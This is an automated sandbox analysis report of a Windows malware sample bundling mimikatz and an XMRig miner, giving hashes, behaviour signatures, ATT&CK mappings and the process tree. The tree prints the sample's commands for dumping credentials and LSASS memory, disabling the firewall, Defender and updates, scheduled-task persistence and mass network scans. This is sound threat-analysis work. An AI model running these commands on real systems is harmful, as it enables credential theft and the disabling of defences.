Overview

overview

10

Static

static

10

2024-11-26...tz.exe

windows7-x64

10

2024-11-26...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 13:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe

  • Size

    9.7MB

  • MD5

    6f9e36e57297c31b816334750f50f887

  • SHA1

    660b1b9e7e6048f7c168dafcb513f0a2906dd729

  • SHA256

    53dc7b99cdb3d5dffb9adf9bfeb240e658275ceebcc801d32b5f8a60404c087a

  • SHA512

    709fa850e551145bf3f29c2db770ee8cbcf3dc2b4baeb4057f21a3135aae99bebf4bf00873277c3f2c24a39681c74359668e522f45b49f478166f54be239d265

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Mimikatz family
    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (20637) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 10 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1004
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3600
    • C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3704
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4828
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1348
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4548
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2424
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:396
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4636
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3388
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4524
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3200
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:736
          • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
            C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4920
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:864
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:4964
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4576
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4316
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5096
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3424
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4592
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3804
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:336
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:2396
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                    PID:4396
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2480
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2980
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1072
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4520
                • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                  C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3636
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3608
                • C:\Windows\zthyliniv\Corporate\vfshost.exe
                  C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3928
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3356
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2264
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1544
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1116
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3084
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3368
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                2⤵
                  PID:2184
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4776
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3200
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3520
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3212
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3056
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2972
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3728
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4316
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3916
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1700
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4944
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4396
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3216
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1680
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:968
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:4476
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3704
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3012
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:396
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:724
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3892
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3896
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3536
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1956
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4300
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                          PID:2888
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1448
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4536
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3480
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1224
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1160
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1848
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2156
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                        PID:3028
                        • C:\Windows\SysWOW64\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:2684
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config wuauserv start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4996
                        • C:\Windows\SysWOW64\sc.exe
                          sc config wuauserv start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:5028
                      • C:\Windows\TEMP\xohudmc.exe
                        C:\Windows\TEMP\xohudmc.exe
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:3484
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 780 C:\Windows\TEMP\zthyliniv\780.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:880
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1020 C:\Windows\TEMP\zthyliniv\1020.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1532
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1004 C:\Windows\TEMP\zthyliniv\1004.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4124
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2528 C:\Windows\TEMP\zthyliniv\2528.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4568
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2912 C:\Windows\TEMP\zthyliniv\2912.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1768
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2316 C:\Windows\TEMP\zthyliniv\2316.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1608
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3104 C:\Windows\TEMP\zthyliniv\3104.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4024
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3740 C:\Windows\TEMP\zthyliniv\3740.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4004
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3836 C:\Windows\TEMP\zthyliniv\3836.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1872
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3900 C:\Windows\TEMP\zthyliniv\3900.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4304
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3984 C:\Windows\TEMP\zthyliniv\3984.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4108
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2632 C:\Windows\TEMP\zthyliniv\2632.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3180
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3580 C:\Windows\TEMP\zthyliniv\3580.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1044
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 400 C:\Windows\TEMP\zthyliniv\400.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3752
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4992 C:\Windows\TEMP\zthyliniv\4992.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4524
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4440 C:\Windows\TEMP\zthyliniv\4440.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2800
                      • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                        C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4604 C:\Windows\TEMP\zthyliniv\4604.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1532
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1500
                        • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                          ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1680
                    • C:\Windows\SysWOW64\jobnkm.exe
                      C:\Windows\SysWOW64\jobnkm.exe
                      1⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:2052
                    • C:\Windows\system32\cmd.EXE
                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                      1⤵
                        PID:940
                        • C:\Windows\ime\lebulsi.exe
                          C:\Windows\ime\lebulsi.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:996
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                        1⤵
                          PID:1720
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            2⤵
                              PID:2260
                            • C:\Windows\system32\cacls.exe
                              cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                              2⤵
                                PID:4064
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                              1⤵
                                PID:1856
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:2764
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                    2⤵
                                      PID:1776

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Reconnaissance

                                  Resource Development

                                  Initial Access

                                  Execution

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  System Services

                                  1
                                  T1569

                                  Service Execution

                                  1
                                  T1569.002

                                  Persistence

                                  Create or Modify System Process

                                  2
                                  T1543

                                  Windows Service

                                  2
                                  T1543.003

                                  Event Triggered Execution

                                  2
                                  T1546

                                  Image File Execution Options Injection

                                  1
                                  T1546.012

                                  Netsh Helper DLL

                                  1
                                  T1546.007

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  Privilege Escalation

                                  Create or Modify System Process

                                  2
                                  T1543

                                  Windows Service

                                  2
                                  T1543.003

                                  Event Triggered Execution

                                  2
                                  T1546

                                  Image File Execution Options Injection

                                  1
                                  T1546.012

                                  Netsh Helper DLL

                                  1
                                  T1546.007

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  Defense Evasion

                                  Impair Defenses

                                  1
                                  T1562

                                  Disable or Modify System Firewall

                                  1
                                  T1562.004

                                  Credential Access

                                  OS Credential Dumping

                                  1
                                  T1003

                                  LSASS Memory

                                  1
                                  T1003.001

                                  Discovery

                                  Network Service Discovery

                                  2
                                  T1046

